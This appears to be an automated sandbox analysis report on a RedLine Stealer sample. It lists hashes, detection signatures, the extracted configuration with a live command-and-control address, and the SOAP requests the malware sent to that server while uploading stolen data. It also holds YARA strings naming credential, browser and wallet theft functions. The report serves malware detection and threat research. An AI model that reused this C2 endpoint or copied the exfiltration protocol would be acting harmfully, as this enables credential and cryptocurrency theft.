Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PalEak0Yh6.exe

Overview

General Information

Sample name:PalEak0Yh6.exe
renamed because original name is a hash value
Original sample name:c69b2b190f08dc6bb255a2c0ce1c148b.exe
Analysis ID:1632466
MD5:c69b2b190f08dc6bb255a2c0ce1c148b
SHA1:b3d29e545e0b3fb9e83968c3b6d0f3c7dbee67f4
SHA256:3d6a6e8d03f0b291d9709a0d623b01f76d3f92f3fe395b6f57027cc9e892aa30
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PalEak0Yh6.exe (PID: 7800 cmdline: "C:\Users\user\Desktop\PalEak0Yh6.exe" MD5: C69B2B190F08DC6BB255A2C0CE1C148B)
    • PalEak0Yh6.exe (PID: 7848 cmdline: "C:\Users\user\Desktop\PalEak0Yh6.exe" MD5: C69B2B190F08DC6BB255A2C0CE1C148B)
    • PalEak0Yh6.exe (PID: 7960 cmdline: "C:\Users\user\Desktop\PalEak0Yh6.exe" MD5: C69B2B190F08DC6BB255A2C0CE1C148B)
    • PalEak0Yh6.exe (PID: 7972 cmdline: "C:\Users\user\Desktop\PalEak0Yh6.exe" MD5: C69B2B190F08DC6BB255A2C0CE1C148B)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.137.22.163:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.1361632344.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.1361632344.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000004.00000002.1361632344.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          00000000.00000002.1213688034.0000000003819000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1213688034.0000000003819000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 11 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.PalEak0Yh6.exe.3831398.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.PalEak0Yh6.exe.3831398.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.PalEak0Yh6.exe.3831398.4.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  0.2.PalEak0Yh6.exe.3831398.4.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
                  • 0xfbcb:$gen01: ChromeGetRoamingName
                  • 0xfbff:$gen02: ChromeGetLocalName
                  • 0xfc28:$gen03: get_UserDomainName
                  • 0x11e67:$gen04: get_encrypted_key
                  • 0x113e3:$gen05: browserPaths
                  • 0x1172b:$gen06: GetBrowsers
                  • 0x11061:$gen07: get_InstalledInputLanguages
                  • 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
                  • 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
                  • 0x7318:$spe6: windows-1251, CommandLine:
                  • 0x125bd:$spe9: *wallet*
                  • 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
                  • 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
                  • 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042
                  • 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
                  • 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63
                  • 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
                  • 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
                  • 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
                  • 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
                  • 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
                  0.2.PalEak0Yh6.exe.3831398.4.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x147ea:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147cb:$v2_6: GetUpdates
                  Click to see the 20 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-08T00:46:25.240103+010020450001Malware Command and Control Activity Detected45.137.22.16355615192.168.2.449713TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-08T00:46:30.158401+010020460561A Network Trojan was detected45.137.22.16355615192.168.2.449713TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-08T00:46:30.158401+010020450011Malware Command and Control Activity Detected45.137.22.16355615192.168.2.449713TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-08T00:46:20.229891+010028496621Malware Command and Control Activity Detected192.168.2.44971345.137.22.16355615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-08T00:46:25.466276+010028493511Malware Command and Control Activity Detected192.168.2.44971345.137.22.16355615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-08T00:46:32.941346+010028482001Malware Command and Control Activity Detected192.168.2.44972345.137.22.16355615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-08T00:46:30.569010+010028493521Malware Command and Control Activity Detected192.168.2.44972145.137.22.16355615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-08T00:46:20.229891+010018000001Malware Command and Control Activity Detected192.168.2.44971345.137.22.16355615TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 0.2.PalEak0Yh6.exe.38b5690.5.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["45.137.22.163:55615"], "Bot Id": "cheat"}
                  Multi AV Scanner detection for submitted file
                  Source: PalEak0Yh6.exeVirustotal: Detection: 45%Perma Link
                  Source: PalEak0Yh6.exeReversingLabs: Detection: 63%
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: PalEak0Yh6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.75.172:443 -> 192.168.2.4:49716 version: TLS 1.0
                  Source: PalEak0Yh6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: SFXH.pdb source: PalEak0Yh6.exe
                  Source: Binary string: SFXH.pdbSHA256 source: PalEak0Yh6.exe
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 4x nop then jmp 0734B24Fh0_2_0734ABC8

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49713 -> 45.137.22.163:55615
                  Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49713 -> 45.137.22.163:55615
                  Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49723 -> 45.137.22.163:55615
                  Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49721 -> 45.137.22.163:55615
                  Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.137.22.163:55615 -> 192.168.2.4:49713
                  Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49713 -> 45.137.22.163:55615
                  Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.137.22.163:55615 -> 192.168.2.4:49713
                  Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 45.137.22.163:55615 -> 192.168.2.4:49713
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 45.137.22.163:55615
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49723
                  Source: global trafficTCP traffic: 192.168.2.4:49713 -> 45.137.22.163:55615
                  Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.163:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.163:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.163:55615Content-Length: 929468Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.163:55615Content-Length: 929460Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 172.67.75.172 172.67.75.172
                  Source: Joe Sandbox ViewIP Address: 45.137.22.163 45.137.22.163
                  Source: Joe Sandbox ViewIP Address: 45.137.22.163 45.137.22.163
                  Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: unknownHTTPS traffic detected: 172.67.75.172:443 -> 192.168.2.4:49716 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.163:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.163:55615
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.163:55615/
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002B18000.00000004.00000800.00020000.00000000.sdmp, PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: tmp6D11.tmp.4.drString found in binary or memory: https://ac.ecosia.org?q=
                  Source: PalEak0Yh6.exe, PalEak0Yh6.exe, 00000004.00000002.1361632344.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                  Source: PalEak0Yh6.exe, PalEak0Yh6.exe, 00000004.00000002.1361632344.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                  Source: tmp6D11.tmp.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: PalEak0Yh6.exe, 00000004.00000002.1367759997.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, tmpDC4F.tmp.4.dr, tmpA510.tmp.4.dr, tmp6D31.tmp.4.dr, tmp6D00.tmp.4.dr, tmpA4EF.tmp.4.dr, tmpA521.tmp.4.dr, tmpA4DE.tmp.4.dr, tmpA520.tmp.4.dr, tmpA4FF.tmp.4.dr, tmpA4CD.tmp.4.dr, tmpA4CC.tmp.4.dr, tmp6D11.tmp.4.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: PalEak0Yh6.exe, 00000004.00000002.1367759997.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, tmpDC4F.tmp.4.dr, tmpA510.tmp.4.dr, tmp6D31.tmp.4.dr, tmp6D00.tmp.4.dr, tmpA4EF.tmp.4.dr, tmpA521.tmp.4.dr, tmpA4DE.tmp.4.dr, tmpA520.tmp.4.dr, tmpA4FF.tmp.4.dr, tmpA4CD.tmp.4.dr, tmpA4CC.tmp.4.dr, tmp6D11.tmp.4.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: tmp6D11.tmp.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
